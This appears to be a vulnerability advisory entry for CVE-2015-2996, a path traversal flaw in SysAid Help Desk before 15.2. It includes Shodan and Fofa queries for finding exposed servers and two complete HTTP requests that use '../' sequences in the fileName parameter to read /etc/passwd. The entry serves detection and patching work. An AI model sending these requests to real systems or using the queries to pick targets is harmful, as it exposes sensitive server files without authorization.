| Title | SysAid Help Desk <15.2 - Local File Inclusion |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. |
| Remediation | Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability. |
| CVSS Score | 8.5 |
| EPSS Score | 0.89001 |
| CVE ID | CVE-2015-2996 |
| CWE ID | CWE-22 |
| Shodan Query | http.favicon.hash:1540720428 |
| Fofa Query | icon_hash=1540720428 |
| Tags | cve2015 cve sysaid lfi seclists vuln |
SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.25
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-2996.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-2996.pcap
N/AN/A